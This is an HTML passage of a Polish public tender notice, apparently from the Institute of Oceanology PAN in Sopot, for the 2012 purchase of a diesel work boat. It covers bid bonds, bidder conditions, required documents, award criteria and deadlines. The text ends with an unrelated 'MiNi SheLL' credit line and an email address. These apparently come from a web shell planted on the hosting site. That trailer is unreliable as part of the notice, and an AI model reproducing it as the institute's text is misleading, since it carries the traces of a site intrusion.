9.	W przypadku wniesienia wadium w formie poręczenia lub gwarancji, Zamawiający wymaga aby w swojej treści zawierało zobowiązanie do bezwarunkowej zapłaty całości sumy wadium na pierwsze żądanie zamawiającego oraz przewidywało bezwarunkową utratę wadium na rzecz Zamawiającego w przypadkach określonych w art. 46 ust. 4a i art. 46 ust. 5 ustawy Prawo zamówień publicznych.
10.	Zgodnie z art. 46 ust. 4a ustawy, zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.3 ustawy, nie złożył dokumentów lub oświadczeń, o których mowa w ust. 25 ust.1 ustawy lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
11.	Zgodnie z art. 46 ust. 5 ustawy, Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
1).	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
2).	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
3).	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy. 
12.	Zamawiający, z zastrzeżeniem punktu 10 i 11, niezwłocznie zwróci wykonawcom wniesione wadia, zgodnie z zasadami określonymi w art. 46 ust. 1-4 ustawy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający warunek w zakresie posiadania wiedzy i doświadczenia - w postaci należytego wykonania w okresie ostatnich trzech lat przed upływem terminu  składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie, co najmniej dwóch zamówień odpowiadających przedmiotowi zamówienia, każde polegające na dostawie co najmniej jednej łodzi roboczej o długości 10-11m z silnikiem stacjonarnym wysokoprężnym. Ocena spełnienia warunku nastąpi w oparciu o przedstawione przez Wykonawcę dokumenty wskazane w punkcie IV.1.1. oraz IV.1.2. SIWZ. Jeżeli Wykonawca złoży oświadczenie o spełnianiu ww. warunku według wzoru stanowiącego Załącznik nr 4 do SIWZ oraz wykaz wykonanych dostaw spełniających wymagania określone w SIWZ, z podaniem przedmiotu, dat wykonania i odbiorców, według wzoru stanowiącego Załącznik nr 3 do SIWZ oraz załączy dokumenty potwierdzające, że te dostawy zostały wykonane należycie - Zamawiający uzna warunek za spełniony.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający warunki w zakresie
dysponowania odpowiednim potencjałem technicznym. Ocena spełniania warunku nastąpi na podstawie przedstawionego przez Wykonawcę oświadczenia wskazanego w punkcie IV.1.1. SIWZ. Jeżeli Wykonawca złoży oświadczenie o spełnianiu ww. warunku według wzoru stanowiącego Załącznik nr 4 do SIWZ - Zamawiający uzna warunek za spełniony.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający warunki w zakresie dysponowania osobami zdolnymi do wykonania zamówienia. Ocena spełniania warunku nastąpi na podstawie przedstawionego przez Wykonawcę oświadczenia wskazanego w punkcie IV.1.1. SIWZ. Jeżeli Wykonawca złoży oświadczenie o spełnianiu ww. warunku według wzoru stanowiącego Załącznik nr 4 do SIWZ - Zamawiający uzna warunek za spełniony.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający warunki w zakresie
posiadania sytuacji ekonomicznej i finansowej - zapewniającej wykonanie zamówienia.
Ocena spełniania warunku nastąpi na podstawie przedstawionego przez Wykonawcę oświadczenia wskazanego w punkcie IV.1.1. SIWZ. Jeżeli Wykonawca złoży oświadczenie o spełnianiu ww. warunku według wzoru stanowiącego Załącznik nr 4 do SIWZ - Zamawiający uzna warunek za spełniony.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Zestawienie wymagań, parametrów technicznych i funkcjonalności - zgodnie z wzorem stanowiącym załącznik nr 2 do SIWZ</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	formularz ofertowo - cenowy (oświadczenie) - wypełniony zgodnie z wzorem stanowiącym Załącznik nr 1 do SIWZ,  
2)	dowód wniesienia wadium;
3)	pełnomocnictwo dla osoby, której prawo do reprezentacji nie wynika z odpisu z właściwego rejestru; pełnomocnictwo musi być złożone w formie oryginału lub poświadczonej notarialnie lub przez mocodawcę kopii, sporządzonego przez notariusza odpisu lub wyciągu z dokumentu; treść pełnomocnictwa musi jednoznacznie określać czynności do wykonania których pełnomocnik jest upoważniony,
4)	dokument pełnomocnictwa pełnomocnika występującego w imieniu podmiotów ubiegających się o wspólne wykonanie zamówienia w przypadku składania oferty wspólnej; pełnomocnictwo musi być złożone w formie oryginału lub poświadczonej notarialnie kopii, sporządzonego przez notariusza odpisu lub wyciągu z dokumentu; treść pełnomocnictwa musi jednoznacznie określać czynności do wykonania których pełnomocnik jest upoważniony.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Termin dostawy - 10</li>
<li>3 - Okres gwarancji - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zakazane są istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, z wyjątkiem zmian, których wystąpienie Zamawiający przewiduje, tj. w zakresie  terminu realizacji umowy, przedmiotu umowy, sposobu płatności lub komparycji umowy i których konieczność wprowadzenia wynikać będzie z następujących okoliczności: 
a)	służyć to będzie podniesieniu standardu przedmiotu zamówienia lub zmiany te będą korzystne dla Zamawiającego, i nie będzie to wykraczało poza określenie przedmiotu zamówienia zawartego w SIWZ ani nie zwiększy wynagrodzenia Wykonawcy; 
b)	zmiany dotyczące terminu wykonania zamówienia - w przypadku, w którym nie ma możliwości dotrzymania przez Wykonawcę terminu wykonania przedmiotu zamówienia z przyczyn niezależnych od Wykonawcy; 
c)	zmiana dotycząca przedmiotu zamówienia, jego zakresu, wynagrodzenia Wykonawcy, jego rozliczenia oraz obowiązków Wykonawcy i warunków gwarancji - w przypadku wystąpienia okoliczności nie przewidzianych w chwili zawarcia umowy, a skutkujących koniecznością ograniczenia przez Zamawiającego zakresu przedmiotu zamówienia; 
d)	zmiany dotyczące terminu wykonania przedmiotu zamówienia, zakresu przedmiotu zamówienia oraz wynagrodzenia - w przypadku, gdy wystąpi możliwość wykonania przedmiotu zamówienia w sposób inny od przewidzianego w SIWZ, a zarazem korzystny dla Zamawiającego i nie będzie to wykraczało poza określenie przedmiotu zamówienia zawartego w SIWZ ani nie zwiększy wynagrodzenia Wykonawcy; 
e)	zmiana dotycząca terminu wykonania przedmiotu zamówienia - w przypadku wystąpienia okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach;
f)	zmiany dotyczące terminu wykonania przedmiotu zamówienia - w przypadku konieczności prowadzenia działań przez osoby trzecie uniemożliwiające wykonywanie przedmiotu zamówienia, które to działania nie są spowodowane przyczynami leżącymi po stronie Wykonawcy; 
g)	urzędowej zmiany, w okresie trwania umowy, wysokości wskaźnika podatku VAT (także obniżka);
h)	zmiany umowy są konieczne w związku ze zmianą odpowiednich przepisów prawa, 
i)	zmiany umowy są konieczne na skutek działania organów administracji lub instytucji upoważnionych do wydania decyzji albo innych aktów władczych lub nadzorczych, związanych z realizacją przedmiotu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.iopan.gda.pl/bip/przetarg169/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytut Oceanologii Polskiej Akademii Nauk, ul. Powstańców Warszawy 55, 81-712 Sopot, pok. 107.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.10.2012 godzina 09:45, miejsce: Instytut Oceanologii Polskiej Akademii Nauk, ul. Powstańców Warszawy 55, 81-712 Sopot, pok. 120.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Niniejsze zamówienie jest w całości finansowane w ramach projektu SATELITARNA KONTROLA ŚRODOWISKA MORZA BAŁTYCKIEGO (SatBałtyk) projekt nr POIG.01.01.02-22-011/09-01.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com